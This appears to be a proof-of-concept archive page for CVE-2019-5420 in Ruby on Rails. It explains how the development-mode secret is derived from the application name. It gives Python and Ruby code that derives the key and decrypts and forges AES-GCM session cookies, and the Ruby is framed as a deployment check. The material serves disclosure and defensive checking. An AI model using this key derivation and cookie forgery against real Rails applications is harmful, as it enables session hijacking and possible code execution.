POC details: 147424d2ea0a856118d29e5b970e43cdda49ecb0

Source
Related vulnerability
Title: Ruby on Rails security feature issue vulnerability (CVE-2019-5420)
Description: Ruby on Rails is an open-source web application framework based on the Ruby language, developed by the Rails team. Ruby on Rails contains a security feature issue vulnerability. A remote attacker could exploit this vulnerability to execute arbitrary code on the affected system.
Description
A vulnerability can allow an attacker to guess the automatically generated development mode secret token.
Introduction
# CVE-2019-5420
A vulnerability can allow an attacker to guess the automatically generated development mode secret token.

The issue affects Ruby on Rails when it is running in development mode. In development mode, it is possible for an attacker to guess the key used to secure the sessions.

# Decryption:

## Key generation:
Rails uses three environments (development, test, production). When an application runs in development mode, you are able to guess the secret token and decrypt the encrypted session.

The key used to protect the session is derived from the application's name.

Example:
```bash
rails new Jakom
```
Jakom: Application Name.

From this, the key can be derived as the output of the following generation method:
```
PBKDF2_HMAC_SHA1[ MD5 [ APPNAME + "::Application" ] , salt: "authenticated encrypted cookie" , iterations: 1000 , key's length: 32 ]
```
As we can see here:
```python
from hashlib import md5, pbkdf2_hmac

md5_name = md5(b"Jakom::Application").hexdigest()  # MD5 hex digest of APPNAME + "::Application"
key = pbkdf2_hmac("sha1", md5_name.encode("utf-8"), "authenticated encrypted cookie".encode("utf-8"), 1000, 32)
```
## Decrypt the session with the key:

In Rails, sessions are encrypted with AES-256-GCM; if you have the key you can decrypt and encrypt sessions.

Last thing you will need is the format of the session:
```
BASE64 [ DATA ] -- BASE64 [ IV ] -- BASE64 [ AUTH_TAG ]
```

## Decrypt example:
As we can see here:
```python
import base64, binascii

# base64_data: the raw session cookie value, BASE64[DATA]--BASE64[IV]--BASE64[AUTH_TAG]
data_b64, iv_b64, tag_b64 = base64_data.split("--")
data = binascii.hexlify(base64.b64decode(data_b64)).decode("utf-8")
iv = binascii.hexlify(base64.b64decode(iv_b64)).decode("utf-8")
tag = binascii.hexlify(base64.b64decode(tag_b64)).decode("utf-8")
```
The first part of the session cookie is the encrypted data, the second part is the IV, the third part is the GCM tag (Authentication Tag).
With this information we can decrypt the session directly:
![image](https://user-images.githubusercontent.com/48088579/132349913-ed4e4e16-a50c-4652-9eee-d561d8372d0c.png)

### Example:

![image](https://user-images.githubusercontent.com/48088579/132350436-c798596f-3c15-4e47-8d2f-d1bd63a4045d.png)
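The key derivation and cookie decryption described above, combined into one check in Ruby (an added example, not the repository's `exploit.py` or Rails code): it derives the development-mode key for a given application name and reports whether a session cookie verifies under it, so an operator can confirm a deployment is not issuing cookies under the predictable key. The `build_dev_mode_cookie` helper and the session JSON are constructed stand-ins for a Rails app; the salt, iteration count and key length are the Rails defaults the README lists, and `Jakom` is the README's application name.

```ruby
require "openssl"
require "digest"
require "uri"
COOKIE_SALT = "authenticated encrypted cookie" # Rails default authenticated_encrypted_cookie_salt
ITERATIONS  = 1000                              # ActiveSupport::KeyGenerator default
KEY_LEN     = 32                                # aes-256-gcm key size in bytes

# Development-mode secret_key_base is the MD5 hex digest of "<AppName>::Application",
# stretched with PBKDF2-HMAC-SHA1 into the cookie key, as the README states.
def dev_mode_cookie_key(app_name)
  secret_key_base = Digest::MD5.hexdigest("#{app_name}::Application")
  OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret_key_base, COOKIE_SALT, ITERATIONS, KEY_LEN)
end

# URL-decode the header value, then split "base64(data)--base64(iv)--base64(tag)".
def split_cookie(header_value)
  parts = URI.decode_www_form_component(header_value).split("--")
  raise ArgumentError, "expected 3 '--' separated parts, got #{parts.size}" unless parts.size == 3
  parts.map { |p| p.unpack1("m0") } # strict Base64 decode
end

# Plaintext session if the cookie verifies under the predictable key; nil (the healthy result) otherwise.
def decrypt_with_dev_key(header_value, app_name)
  data, iv, tag = split_cookie(header_value)
  cipher = OpenSSL::Cipher.new("aes-256-gcm").decrypt
  cipher.key = dev_mode_cookie_key(app_name)
  cipher.iv = iv
  cipher.auth_tag = tag # GCM checks the tag in #final; a wrong key raises CipherError
  cipher.auth_data = ""
  cipher.update(data) + cipher.final
rescue OpenSSL::Cipher::CipherError
  nil
end

# Constructed stand-in for a Rails app (not Rails code): emits a cookie in the same format,
# URL-escaped as it would appear in a Set-Cookie header, so the check can run offline.
def build_dev_mode_cookie(session_json, app_name)
  cipher = OpenSSL::Cipher.new("aes-256-gcm").encrypt
  cipher.key = dev_mode_cookie_key(app_name)
  iv = cipher.random_iv
  cipher.auth_data = ""
  data = cipher.update(session_json) + cipher.final
  URI.encode_www_form_component([data, iv, cipher.auth_tag].map { |b| [b].pack("m0") }.join("--"))
end

if __FILE__ == $0
  cookie = build_dev_mode_cookie('{"session_id":"constructed"}', "Jakom")
  puts decrypt_with_dev_key(cookie, "Jakom")    # session JSON: the predictable key works
  p    decrypt_with_dev_key(cookie, "OtherApp") # nil: key does not match
end
```

To check a real deployment, pass the value of its `_<app>_session` cookie and the app's class-name prefix; a non-nil result means the application is still using the derived development secret.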
File snapshot

```
[4.0K] /data/pocs/147424d2ea0a856118d29e5b970e43cdda49ecb0
├── [1.2K] exploit.py
├── [1.9K] README.md
└── [ 30] requirements.txt

0 directories, 3 files
```